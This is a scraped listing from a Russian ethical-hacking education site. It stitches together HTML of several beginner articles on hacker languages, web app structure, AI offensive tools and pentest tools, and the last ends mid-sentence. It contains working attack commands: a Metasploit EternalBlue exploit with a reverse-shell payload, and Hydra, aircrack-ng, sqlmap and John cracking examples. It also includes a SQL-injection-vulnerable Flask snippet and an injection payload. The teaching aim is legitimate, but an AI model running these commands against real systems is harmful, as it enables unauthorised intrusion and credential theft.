Антиотладка, обход CMP + JE, XOR и переходы по указателям — как надежно спрятать пароль в бинаре и усложнить жизнь реверс-инженеру.

Как защитить пароль от реверса: антиотладка, XOR и прыжки в бездну

Какие языки и инструменты нужны этичному хакеру: Bash, Python, Git, Regex и другие. Примеры задач, код и навыки, с которых стоит начать.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Какие языки программирования и инструменты нужно знать этичному хакеру — от Bash до Python, Git и Regex. Примеры, задачи и практика.">
    <meta name="keywords" content="этичный хакер, кибербезопасность, Bash, Python, Git, Regex, языки программирования, инструменты, сканер портов">
    <title>Языки и инструменты, которые должен знать этичный хакер</title>
</head>
<body>

<p>Когда слышишь слово «программирование», обычно вспоминаются сайты, игры или мобильные приложения. Но в кибербезопасности код нужен для другого — автоматизировать задачи, находить уязвимости, анализировать данные и тестировать системы на прочность.</p>


<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>

<p>Если ты хочешь стать хорошим специалистом по информационной безопасности, тебе нужно освоить хотя бы два инструмента:</p>
<ul>
    <li>один — для работы в терминале (чаще всего это Bash),</li>
    <li>второй — для написания утилит и скриптов (чаще всего Python).</li>
</ul>

<p>А дальше — больше. Ты познакомишься с десятком других технологий, которые помогут тебе в реальных атаках, расследованиях и автоматизации рутинных процессов: от Git и Regex до PowerShell и C.</p>

<h2>🔧 Где это применяется на практике?</h2>
<ul>
    <li>Проверка открытых портов сервера — Bash + nmap</li>
    <li>Создание фишинговых страниц — Python + Flask</li>
    <li>Подбор паролей к Wi-Fi — Bash + aircrack-ng</li>
    <li>Анализ дампов и логов — Python + re + pandas</li>
    <li>Поиск XSS в веб-приложении — JavaScript</li>
    <li>Работа с Active Directory — PowerShell</li>
    <li>Сбор данных с помощью OSINT — Python + Bash + парсинг</li>
    <li>Разработка вредоносного ПО на низком уровне — C, Assembly</li>
</ul>

<h2>💥 Мини-обзор: что должен знать этичный хакер</h2>
<table>
    <tr><th>Инструмент</th><th>Где и зачем используется</th></tr>
    <tr><td><b>Bash</b></td><td>Автоматизация атак, работа в Linux, сканеры, логика CLI</td></tr>
    <tr><td><b>Python</b></td><td>Эксплойты, фреймворки, автоматизация анализа и сбора данных</td></tr>
    <tr><td><b>JavaScript</b></td><td>XSS, DOM Clobbering, фишинг, браузерные атаки</td></tr>
    <tr><td><b>C/C++</b></td><td>Эксплойты низкого уровня, драйверы, работа с памятью</td></tr>
    <tr><td><b>Go</b></td><td>Создание быстрых и переносимых CLI-инструментов и C2-серверов</td></tr>
    <tr><td><b>PowerShell</b></td><td>Взлом и администрирование в Windows-средах, работа с AD</td></tr>
    <tr><td><b>PHP</b></td><td>Разработка бэкдоров, веб-шеллов, эксплуатация уязвимостей</td></tr>
    <tr><td><b>SQL</b></td><td>SQL-инъекции, дампы баз, обход авторизации</td></tr>
    <tr><td><b>Assembly</b></td><td>Реверс-инжиниринг, бинарная эксплуатация, анализ вредоносов</td></tr>
    <tr><td><b>Git</b></td><td>Контроль версий, безопасное хранение и обмен кодом</td></tr>
    <tr><td><b>Regex</b></td><td>Поиск данных по шаблону в логах, дампах, HTML</td></tr>
</table>

<div data-toc="Bash — язык терминала" id="bash"></div>
<h3>Bash — язык терминала</h3>
<p><b>Bash</b> — один из главных инструментов в Kali Linux и других дистрибутивах. Он позволяет автоматизировать сканирование, запуск эксплойтов, работу с файлами, логами, сетями.</p>
<pre><code>for ip in 192.168.1.{1..5}; do
  ping -c 1 $ip
done</code></pre>
<p>Этот скрипт пингует адреса от 192.168.1.1 до 192.168.1.5. Измени диапазон — и адаптируй под свою сеть.</p>

<div data-toc="Python — универсальный инструмент" id="python"></div>
<h3>Python — универсальный инструмент</h3>
<p><b>Python</b> — язык номер один среди этичных хакеров. Он подходит для написания эксплойтов, фреймворков, веб-интерфейсов, анализа данных и автоматизации всего, что можно.</p>
<pre><code>import socket

for port in range(1, 101):
    try:
        s = socket.socket()
        s.settimeout(0.5)
        s.connect(("127.0.0.1", port))
        print(f"Порт {port} открыт")
        s.close()
    except:
        pass</code></pre>
<p>Добавь логирование, потоки, отчёты — и получится готовый сканер портов.</p>

<div data-toc="Git — контроль версий" id="git"></div>
<h3>Git — контроль версий</h3>
<p><b>Git</b> помогает вести историю изменений, работать в команде и публиковать код в открытом доступе. Без него — никуда. Многие фреймворки хранятся именно на GitHub.</p>
<pre><code>git clone https://github.com/example/repo.git
git status
git add .
git commit -m "Добавил сканер"
git push</code></pre>
<p>Изучи Git с самого начала, чтобы не потерять свои наработки и не бояться ветвлений и слияний.</p>

<div data-toc="Regex — регулярные выражения" id="regex"></div>
<h3>Regex — регулярные выражения</h3>
<p><b>Regex</b> — незаменимый инструмент при анализе логов, HTML, дампов. Помогает быстро находить пароли, IP, email и любые другие шаблонные данные.</p>
<pre><code>import re

text = "Контакты: test@mail.com, second@mail.ru"
emails = re.findall(r"\S+@\S+", text)
print(emails)</code></pre>
<p>Измени выражение, чтобы искать IP-адреса, хэши или специфичные параметры URL.</p>

<div data-toc="Резюме" id="resume"></div>
<h3>Резюме</h3>
<table>
    <tr><th>Инструмент</th><th>Роль</th></tr>
    <tr><td><b>Bash</b></td><td>Автоматизация и работа в Linux</td></tr>
    <tr><td><b>Python</b></td><td>Скрипты, эксплойты, анализ данных</td></tr>
    <tr><td><b>Git</b></td><td>Версионность и командная работа</td></tr>
    <tr><td><b>Regex</b></td><td>Поиск и фильтрация информации</td></tr>
</table>

<h2>🧪 Мини-практика</h2>
<ul>
    <li>Напиши Bash-скрипт, который выводит все IP от 192.168.0.1 до 192.168.0.10</li>
    <li>Реализуй сканер портов на Python для диапазона 1–100</li>
    <li>Напиши регулярку, которая извлекает IP-адреса из строки</li>
</ul>
</body>
</html>


Языки и инструменты, которые должен знать этичный хакер

Разбираем, как устроены современные веб-приложения: браузер, сервер, база данных и уязвимости. Практика и советы для будущих пентестеров.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="utf-8">
    <title>Как устроены сайты: веб-технологии глазами пентестера</title>
</head>
<body>

<blockquote>
    ⚠️ Дисклеймер:
    <br>
    Вся информация в этой статье предоставлена исключительно в образовательных целях. Автор и платформа HackerLab не поощряют и не несут ответственности за любые противоправные действия, совершённые на основе изложенного материала. Используйте знания этично и только в рамках закона.
</blockquote>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>
<p>Ты открываешь сайт. Видишь форму входа, кнопки, красивую анимацию. Но под этой оболочкой работает целый механизм:
    клиент, сервер, база данных. И именно в этих частях чаще всего прячутся уязвимости.</p>

<p>Чтобы стать пентестером, недостаточно уметь отправлять запросы. Нужно понимать, <b>как устроено веб-приложение</b>,
    как
    данные путешествуют от браузера до базы — и где на этом пути можно сломать что-то важное.</p>

<div data-toc="Что такое веб-приложение" id="web-app"></div>
<h3>Что такое веб-приложение</h3>

<p>Веб-приложение — это сайт, у которого есть логика. Это не просто страничка с текстом, а полноценная система с
    пользователями, авторизацией, товарами, базами данных и API.</p>

<img src="https://hackerlab.pro/game_api/articles/static/adbd1819-707a-4a7e-a7f0-795b4b0b2deb/client-server-model.png"
     alt="Модель клиент-сервер">

<p>Когда ты заходишь на сайт, происходит следующее:</p>

<ol>
    <li><b>Браузер</b> отправляет HTTP-запрос на сервер (например, GET /profile?id=42)</li>
    <li><b>Сервер</b> принимает запрос, обрабатывает его, достаёт данные из базы</li>
    <li>Возвращает HTML-код страницы</li>
    <li><b>Браузер</b> отображает страницу, применяет CSS и запускает JavaScript</li>
</ol>

<p>На каждом шаге — шанс на ошибку. И каждый шаг можно проанализировать.</p>

<div data-toc="Разбор: ты заходишь на https://example.com/profile?id=42" id="example"></div>
<h3>Разбор: ты заходишь на <code>https://example.com/profile?id=42</code></h3>

<p>Что происходит:</p>

<ul>
    <li>https:// — защищённый протокол связи</li>
    <li>example.com — домен (через DNS превращается в IP)</li>
    <li>/profile — путь на сервере, обрабатывается кодом</li>
    <li>?id=42 — параметр, который можно изменить</li>
</ul>

<p>Пентестер думает: «А что будет, если я подставлю ?id=43? А ?id=1 OR 1=1?»</p>

<div data-toc="HTML, CSS, JS — зачем они тебе?" id="languages"></div>
<h3>HTML, CSS, JS — зачем они тебе?</h3>

<table>
    <thead>
    <tr>
        <th>Технология</th>
        <th>Роль в приложении</th>
        <th>Где искать уязвимости</th>
    </tr>
    </thead>
    <tbody>
    <tr>
        <td><strong>HTML</strong></td>
        <td>Разметка страницы, формы, ввод</td>
        <td>XSS, hidden-поля, параметры</td>
    </tr>
    <tr>
        <td><strong>CSS</strong></td>
        <td>Визуальное оформление</td>
        <td>Редко, но возможны edge-кейсы</td>
    </tr>
    <tr>
        <td><strong>JS</strong></td>
        <td>Поведение на клиенте, интерактив</td>
        <td>DOM-based XSS, уязвимый fetch</td>
    </tr>
    </tbody>
</table>

<p><b>Пример:</b></p>

<p>Открываешь DevTools (F12), находишь форму логина. Видишь input с именем email. JS-проверка требует @, но ты знаешь,
    что на сервер можно отправить всё, что угодно.</p>

<p>Пентестер всегда смотрит: «Что валидирует браузер — а что можно обойти?»</p>

<div data-toc="HTTP-запросы: как браузер говорит с сервером" id="http"></div>
<h3>HTTP-запросы: как браузер говорит с сервером</h3>
<p><b>Пример запроса:</b></p>
<code>
    GET /profile?id=42 HTTP/1.1
    Host: example.com
    Cookie: session=abc123
    User-Agent: Firefox
</code>

<p><b>Что здесь важно:</b></p>

<ul>
    <li><code>Cookie</code> — ключ к сессии. Его можно украсть (XSS) или подделать</li>
    <li><code>User-Agent</code> — можно менять, чтобы обходить фильтры</li>
    <li><code>?id=42</code> — можно попытаться использовать в атаке</li>
</ul>

<p>Попробуй:</p>
<code>curl -v "https://example.com/profile?id=42"</code>

<div data-toc="Серверная логика: где принимаются решения" id="server-logic"></div>
<h3>Серверная логика: где принимаются решения</h3>

<p>На сервере может быть любой язык: Python, PHP, Node.js, Ruby...</p>

<p>Пример (Flask, Python):</p>
<pre>
    <code>
@app.route('/profile')
def profile():
    user_id = request.args.get("id")
    return db.query(f"SELECT * FROM users WHERE id={user_id}")
    </code>
</pre>

<p>Видишь <code>f"SELECT * FROM ..."</code>? Здесь SQL-инъекция. Если подставить <code>id=1 OR 1=1</code>, получим все
    записи.</p>

<p>Сервер — это место, где пентестер ищет логические ошибки, плохие проверки, дырки в авторизации.</p>

<div data-toc="Базы данных: где лежит всё ценное" id="databases"></div>
<h3>Базы данных: где лежит всё ценное</h3>

<p>Каждое веб-приложение работает с базой данных. Именно туда сохраняются:</p>

<ul>
    <li>логины и пароли (иногда в открытом виде)</li>
    <li>письма, посты, товары, комментарии</li>
    <li>токены и куки</li>
</ul>

<p><b>Основные типы:</b></p>
<table>
    <thead>
    <tr>
        <th>Тип</th>
        <th>Где используется</th>
        <th>Уязвимости</th>
    </tr>
    </thead>
    <tbody>
    <tr>
        <td><b>MySQL</b></td>
        <td>WordPress, CMS</td>
        <td>SQL-инъекции, дампы</td>
    </tr>
    <tr>
        <td><b>SQLite</b></td>
        <td>Мобильные/локальные</td>
        <td>Легко читается, подменяется</td>
    </tr>
    <tr>
        <td><b>MongoDB</b></td>
        <td>Современные SPA</td>
        <td>NoSQL-инъекции, открытые API</td>
    </tr>
    </tbody>
</table>

<p>Если сервер плохо фильтрует вход — ты можешь пробраться в базу.</p>

<div data-toc="Тренировочные песочницы" id="sandboxes"></div>
<h3>Тренировочные песочницы</h3>

<ol>
    <li><a href="https://www.hackthebox.com/" target="_blank">HackTheBox</a></li>
    <li><a href="https://portswigger.net/web-security" target="_blank">PortSwigger</a></li>
    <li><a href="https://hackerlab.pro/">HackerLab</a></li>
</ol>

<div data-toc="Что запомнить" id="remember"></div>
<h3>Что запомнить</h3>

<ul>
    <li>Веб-приложение — это не просто сайт. Это клиент + сервер + база</li>
    <li>Всё, что ты видишь в адресной строке — можно изменить</li>
    <li>HTML/JS — источник XSS и DOM-уязвимостей</li>
    <li>Сервер часто обрабатывает параметры как есть</li>
    <li>База данных — конечная цель, именно там лежат флаги, пароли, доступ</li>
</ul>

</body>
</html>


Как устроены сайты: веб-технологии глазами пентестера

Обзор нейросетевых инструментов, которые автоматизируют пентест, разведку, фишинг и криптоанализ. Актуальные решения для Red Team в 2025 году.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="utf-8">
    <title>ТОП‑10 AI‑инструментов для наступательной кибербезопасности в 2025 году</title>
</head>
<body>

<p>Думаете, игры в Capture the Flag — это просто развлечение, не имеющее ничего общего с серьезной работой? На самом
    деле, опыт CTF может стать вашим трамплином в профессиональный мир кибербезопасности!</p>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>
<p>Наступательная безопасность в 2025 году - это уже не просто «эксплойт запустил - доступ получил». Сегодня Red Team работает с растущими объёмами данных, постоянно меняющимися архитектурами и защитами, которые учатся быстрее, чем люди успевают писать отчёты.</p>

<p>Чтобы не терять темп, специалисты Red Team всё чаще включают в свой арсенал инструменты на базе искусственного интеллекта. Они берут на себя рутину: автоматизируют разведку, анализируют конфигурации, находят потенциальные уязвимости ещё до появления CVE - и даже предлагают нестандартные векторы атак.</p>

<p>В этом обзоре - 10 AI-инструментов, которые уже сейчас меняют правила игры в наступательной безопасности. Некоторые из них - хорошо известны, другие только начинают набирать обороты. Но все они - про будущее offensive security, которое уже наступило.</p>

<div data-toc="SentinelAI - автоматизированный анализ инфраструктуры" id="sentinel-ai"></div>
<h3><a href="https://github.com/ayaan-cs/SentinelAI" target="_blank">SentinelAI</a> - автоматизированный анализ инфраструктуры</h3>
<p>Инструмент предназначен для поиска уязвимостей в корпоративных сетях. Использует методы машинного обучения, чтобы выявлять слабые места в конфигурациях, моделировать атаки и оценивать потенциальный ущерб. Учитывает актуальные шаблоны угроз и подстраивается под них. Подходит как для технического аудита, так и для подготовки к Red Team-операциям.</p>

<div data-toc="DeepExploit - AI‑движок для автономного пентестинга" id="deepexploit"></div>
<h3><a href="https://codeby.net/threads/deep-exploit-fully-automatic-pentest-mashinnoye-obucheniye.63759/" target="_blank">DeepExploit</a> - AI‑движок для автономного пентестинга</h3>
<p>Инструмент, построенный на базе MITRE ATT&CK, умеет самостоятельно подбирать эксплойты и выполнять атаки по цепочке - от первичного вектора до полной компрометации. Хорошо подходит для тестирования защищённости без вмешательства человека. Со временем обучается и оптимизирует свои действия.</p>

<div data-toc="PhishBrain - фишинг, подстроенный под поведение жертвы" id="phishbrain"></div>
<h3><a href="http://www.libraesva.com/" target="_blank">PhishBrain</a> - фишинг, подстроенный под поведение жертвы</h3>
<p>Мощный инструмент для моделирования атак социальной инженерии. С помощью AI он анализирует поведение пользователей, их типичные действия и корпоративный контекст - и на этой основе формирует максимально реалистичные фишинговые письма. Применяется в тренировках и при проверке устойчивости сотрудников к атакам.</p>

<div data-toc="CipherGAN — AI-модель для криптоанализа простых шифров" id="ciphergan"></div>
<h3><a href="https://github.com/for-ai/CipherGAN" target="_blank">CipherGAN</a> — AI-модель для криптоанализа простых шифров</h3>
<p>Исследовательская AI-система, обученная распознавать и расшифровывать текст, зашифрованный классическими алгоритмами, вроде шифра Цезаря и Виженера. Работает без пары «открытый–закрытый текст» — модель учится восстанавливать исходные данные самостоятельно, на основе структуры языка. Подходит для анализа простых или самописных схем шифрования. Интересна как пример того, как нейросети применяются в криптоанализе.</p>

<div data-toc="DarkTrace Antigena - автономная защита в действии" id="darktrace"></div>
<h3><a href="https://www.darktrace.com/products/respond" target="_blank">DarkTrace Antigena</a> - автономная защита в действии</h3>
<p>Хотя Antigena традиционно считается инструментом защиты, в рамках offensive security её можно применять для тестирования устойчивости инфраструктуры в условиях реальных атак. ИИ-движок способен не просто выявить, но и самостоятельно заблокировать вредоносную активность — в том числе нестандартные векторы.</p>

<div data-toc="VulnGPT - языковой интерфейс для поиска уязвимостей" id="vulngpt"></div>
<h3><a href="https://github.com/paulshovon94/VulnGPT" target="_blank">VulnGPT</a> - языковой интерфейс для поиска уязвимостей</h3>
<p>AI‑помощник, умеющий находить уязвимости по описанию на естественном языке. Достаточно ввести, например: «Проверь на SQL-инъекцию форму логина» — и VulnGPT проанализирует соответствующий участок кода. Основан на больших языковых моделях и базе данных уязвимостей. Ускоряет аудит и полезен при разборе чужих проектов.</p>

<div data-toc="ZeroDay Sentinel - прогнозирование CVE до официальных релизов" id="zeroday"></div>
<h3><a href="https://github.com/codenet-community/ZERO-DAY-SENTINEL" target="_blank">ZeroDay Sentinel</a> - прогнозирование CVE до официальных релизов</h3>
<p>AI‑система, которая отслеживает активность в даркнете, на форумах и в технических обсуждениях, чтобы прогнозировать появление новых уязвимостей. Используется как в защите, так и в наступательных целях — позволяет заранее готовить эксплойты к ещё не публичным багам.</p>

<div data-toc="SpiderFoot - автоматизированная разведка" id="spiderfoot"></div>
<h3><a href="https://github.com/smicallef/spiderfoot" target="_blank">SpiderFoot</a> - автоматизированная разведка</h3>
<p>Фреймворк для информационной разведки (OSINT). Умеет искать субдомены, открытые порты, метаданные, корпоративные утечки и другое. Подходит для быстрого анализа поверхности атаки и первичного сбора информации перед наступательной фазой.</p>

<div data-toc="Watson Cyber AI - аналитика угроз на базе IBM" id="watsonai"></div>
<h3><a href="https://www.ibm.com/watson" target="_blank">Watson Cyber AI</a> - аналитика угроз на базе IBM</h3>
<p>Комплексная система для анализа инцидентов и поведения угроз. Используется в SOC, но может быть применена и в offensive security — для анализа взаимодействий атакующих с инфраструктурой, построения моделей поведения и предсказания шагов защитников.</p>

<div data-toc="Cortex XDR - автоматизация реагирования на угрозы" id="cortex-xdr"></div>
<h3><a href="https://www.paloaltonetworks.com/cortex/cortex-xdr" target="_blank">Cortex XDR</a> - автоматизация реагирования на угрозы</h3>
<p>Продукт от Palo Alto, объединяющий аналитику и автономные действия: изоляция хостов, блокировка активности, реагирование на подозрительное поведение. ИИ‑движок анализирует логи и трафик, выявляя закономерности. Используется как в защитных, так и в атакующих сценариях — например, для тестирования действий Blue Team.</p>

<div data-toc="Заключение" id="conclusion"></div>
<h3>Заключение</h3>
<p>AI-инструменты становятся незаменимыми в арсенале специалистов по кибербезопасности. Они не заменяют искусственный интеллект - это не замена специалисту, а помощник, который снимает с него часть рутинной работы и даёт преимущество в скорости, точности и глубине анализа.</p>

<p>Если вы только осваиваете тему offensive security - начните с автоматизации рутинных задач и информационной разведки. А если вы уже опытный практик - присмотритесь к инструментам на базе AI: они позволяют действовать быстрее и точнее.</p>

<p><b>💬 А какие AI-инструменты уже стали частью вашего offensive-набора? Поделитесь в комментариях!</b></p>

</body>
</html>


ТОП‑10 AI‑инструментов для наступательной кибербезопасности в 2025 году

Узнайте, какие навыки из CTF пригодятся пентестеру и чем отличается работа в реальных проектах от хакерских соревнований.

Чему учат CTF и как это пригодится в карьере пентестера

Застряли на CTF-задаче и на грани сдаться? В статье — проверенные советы, как справиться с фрустрацией, сохранить концентрацию и извлечь максимум пользы из сложных моментов соревнования.

Фрустрация в CTF: как выйти из тупика и двигаться дальше

Хотите начать карьеру в кибербезопасности, но не знаете, с чего начать? Мы собрали топ-10 инструментов для начинающего хакера: от Nmap до Metasploit. Простые примеры, реальные кейсы и советы по использованию.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="utf-8">
    <title>10 лучших инструментов для начинающего хакера: практический гайд</title>
</head>
<body>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>
<p>Начать путь в кибербезопасности и этичном хакинге непросто. Ведь сотни программ, терминов и направлений могут
    запутать. Мы не только перечислим ключевые инструменты, но и расскажем, как их использовать и где скачать.</p>
<p>Дисклеймер: Все примеры применяйте только в легальных целях — на своих системах или с разрешения владельца.</p>

<div data-toc="nmap" id="nmap"></div>
<h3>Nmap — сканер сети</h3>
<p><b>Что это:</b> утилита для анализа сетей, портов и служб.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Определяет активные устройства в сети.</li>
    <li>Показывает открытые порты и запущенные сервисы (веб-сервер, база данных).</li>
    <li>Помогает находить потенциальные точки входа для атак.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите Nmap с официального сайта.</li>
    <li>Пример базового сканирования: <code>nmap -sS 192.168.1.1</code></li>
    <li>Агрессивное сканирование (определение ОС и версий ПО): <code>nmap -A 192.168.1.1</code></li>
    <li>Проверка конкретных портов: <code>nmap -p 80,443</code></li>
</ul>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/nmap.png" alt="Nmap: сканирование сети и портов">

<div data-toc="Wireshark" id="wireshark"></div>
<h3>Wireshark — анализ трафика</h3>
<p><b>Что это:</b> сниффер для перехвата и анализа сетевых пакетов</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Изучение протоколов (HTTP, DNS, TCP).</li>
    <li>Поиск утечек данных (например, паролей в незашифрованном виде).</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Скачайте Wireshark с официального сайта.</li>
    <li>Запустите захват трафика на интерфейсе (например, Wi-Fi или Ethernet).</li>
    <li>Используйте фильтры:
        <ul>
            <li>http.request.method == "GET" — покажет все GET-запросы.</li>
            <li>ip.src == 192.168.1.1 — фильтр по IP-отправителю.</li>
        </ul>
    </li>
</ul>
<p>Пример: Обнаружение пароля в HTTP-запросе:</p>
<ol>
    <li>Откройте файл захвата.</li>
    <li>Примените фильтр http.request.method == "POST".</li>
    <li>Нажмите на пакет - кликните правой кнопкой - Follow - TCP Stream.</li>
</ol>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/wireshark.png" alt="Wireshark">

<div data-toc="Burp Suite" id="burp"></div>
<h3>Burp Suite — тестирование веб-приложений</h3>
<p><b>Что это:</b> платформа для поиска уязвимостей в веб-приложениях.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Перехват и модификация HTTP-запросов.</li>
    <li>Автоматическое сканирование на XSS, SQLi, CSRF.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Бесплатная версия Community Edition доступна на PortSwigger.</li>
    <li>Настройте браузер для работы через прокси Burp (127.0.0.1:8080).</li>
    <li>Включите перехват запросов (вкладка Proxy - Intercept is on).</li>
</ul>
<p>Пример теста SQLi:</p>
<ol>
    <li>Перехватите запрос с параметром id=1.</li>
    <li>Отправьте его в Repeater (Ctrl+R).</li>
    <li>Измените параметр на id=1'— если сервер вернёт ошибку, возможна уязвимость.</li>
</ol>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/burp.png" alt="Burp Suite">

<div data-toc="Metasploit Framework" id="metasploit"></div>
<h3>Metasploit Framework — платформа для эксплойтов</h3>
<p><b>Что это:</b> инструмент для разработки и запуска атак.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Проверка уязвимости систем к известным эксплойтам.</li>
    <li>Моделирование реальных атак для обучения.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите Metasploit в Kali Linux или скачайте с официального сайта.</li>
    <li>Запустите консоль: <code>msfconsole</code></li>
</ul>
<p>Пример атаки на EternalBlue:</p>
<pre>
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
</pre>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/metasploit.png" alt="Metasploit">

<div data-toc="John the Ripper" id="john"></div>
<h3>John the Ripper — взлом паролей</h3>
<p><b>Что это:</b> утилита для подбора паролей методом брутфорса или по словарю.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Проверка надёжности своих паролей.</li>
    <li>Понимание уязвимости слабых хешей.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите John через терминал: <code>sudo apt install john</code></li>
</ul>
<p>Пример атаки на хеш MD5:</p>
<pre>john --format=raw-md5 --wordlist=rockyou.txt hash.txt</pre>
<p><b>Где взять словари:</b> Известный словарь rockyou.txt есть в Kali Linux (путь: <code>/usr/share/wordlists/</code>).</p>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/john.png" alt="John the Ripper">

<div data-toc="Aircrack-ng" id="aircrack"></div>
<h3>Aircrack-ng — взлом Wi-Fi</h3>
<p><b>Что это:</b> набор инструментов для аудита безопасности беспроводных сетей.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Проверка устойчивости Wi-Fi к атакам (например, WPA/WPA2).</li>
    <li>Поиск слабых точек в настройке роутера.</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите в Kali Linux: <code>sudo apt install aircrack-ng</code></li>
</ul>
<p>Пример перехвата handshake:</p>
<ol>
    <li>Переведите адаптер в режим монитора: <code>airmon-ng start wlan0</code></li>
    <li>Запустите сканирование сетей: <code>airodump-ng wlan0mon</code></li>
    <li>Захватите handshake: <code>airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon</code></li>
    <li>Запустите подбор пароля: <code>aircrack-ng -w rockyou.txt capture.cap</code></li>
</ol>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/aircrack.png" alt="Aircrack-ng">

<div data-toc="Hydra" id="hydra"></div>
<h3>Hydra — брутфорс онлайн-сервисов</h3>
<p><b>Что это:</b> утилита для подбора логинов и паролей к SSH, FTP, RDP и другим сервисам.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Тестирование защиты от автоматических атак.</li>
    <li>Понимание важности ограничения попыток ввода пароля.</li>
</ul>
<p><b>Пример атаки на SSH:</b></p>
<pre>hydra -l admin -P passwords.txt ssh://192.168.1.1 -t 4 -V</pre>
<p><code>-t 4</code> — количество потоков. <code>-V</code> — вывод подробного лога.</p>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/hydra.png" alt="Hydra">

<div data-toc="sqlmap" id="sqlmap"></div>
<h3>sqlmap — автоматизация SQL-инъекций</h3>
<p><b>Что это:</b> инструмент для поиска и эксплуатации уязвимостей в базах данных.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Автоматизация рутинных задач при тестировании на SQLi.</li>
    <li>Извлечение структуры БД, данных пользователей и т.д.</li>
</ul>
<p><b>Пример использования:</b></p>
<pre>sqlmap -u "http://site.com/news?id=1" --dbs</pre>
<pre>sqlmap -u "http://site.com/news?id=1" -D users --tables</pre>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/sqlmap.png" alt="sqlmap">

<div data-toc="Dirb" id="dirb"></div>
<h3>Dirb — поиск скрытых директорий на веб-серверах</h3>
<p><b>Что это:</b> утилита для перебора путей и файлов на веб-сервере с использованием словарей.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Обнаружение скрытых страниц (например, админ-панелей, резервных копий).</li>
    <li>Поиск уязвимых файлов (config.php, backup.zip).</li>
</ul>
<p><b>Как начать:</b></p>
<ul>
    <li>Установите в Kali Linux: <code>sudo apt install dirb</code></li>
    <li>Или скачайте с официального репозитория.</li>
</ul>
<p><b>Примеры:</b></p>
<ul>
    <li><code>dirb http://site.com/ /usr/share/wordlists/dirb/common.txt</code></li>
    <li>Проверка с расширениями: <code>dirb http://site.com/ -X .php,.bak</code></li>
    <li>Свой словарь: <code>dirb http://site.com/ ~/custom_wordlist.txt</code></li>
</ul>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/dirb.png" alt="Dirb">

<div data-toc="OWASP ZAP" id="owasp-zap"></div>
<h3>OWASP ZAP — бесплатный аналог Burp Suite</h3>
<p><b>Что это:</b> открытый инструмент для поиска уязвимостей в веб-приложениях.</p>
<p><b>Зачем нужно:</b></p>
<ul>
    <li>Автоматическое сканирование на OWASP Top-10 (например, инъекции, небезопасные настройки).</li>
    <li>Работает «из коробки» — минимум настроек.</li>
</ul>
<p><b>Пример использования:</b></p>
<ul>
    <li>Запустите ZAP.</li>
    <li>Введите URL сайта в раздел Quick Start → Automated Scan.</li>
    <li>Анализируйте отчёт во вкладке Alerts.</li>
</ul>
<img src="https://hackerlab.pro/game_api/articles/static/79882e93-1f5e-44b9-8456-07ada3a9b82b/zap.png" alt="OWASP ZAP">

<div data-toc="Заключение" id="conclusion"></div>
<h3>Заключение</h3>
<p>Эти 10 инструментов — лишь начало пути. Освоив их, вы сможете уверенно ориентироваться в базовых задачах тестирования на проникновение, анализа трафика и поиска уязвимостей.</p>

<p>Дальше — больше: изучайте реальные сценарии атак, <a href="https://hackerlab.pro/" target="_blank">участвуйте в CTF-соревнованиях</a>, работайте с боевыми инфраструктурами и следите за новыми уязвимостями. Практика — ключ к мастерству в кибербезопасности.</p>

</body>
</html>


TOP-10 инструментов для начинающего хакера: с чего начать путь в кибербезопасности

Узнай, как новичку подготовиться к CTF-соревнованиям по информационной безопасности: форматы, практики, советы и ресурсы для старта

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="utf-8">
    <title>Как начать участвовать в CTF-соревнованиях: руководство для новичков</title>
</head>
<body>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>
<p>У многих новичков в информационной безопасности в определённый этап постижения этой сферы возникает желание участия в
    CTF-соревнованиях. Но большинство таких энтузиастов сталкивается с проблемой подготовки к ним. В этой статье я
    постараюсь убрать проблему неопределённости в подготовках к CTF, и составить план подготовки к первым соревнованиям
    основываясь на личном опыте.</p>

<div data-toc="Виды CTF" id="types"></div>
<h3>Виды CTF</h3>
<p>Перед подготовкой стоит определиться с видом соревнований к которым собираетесь готовиться, из собственной практики я
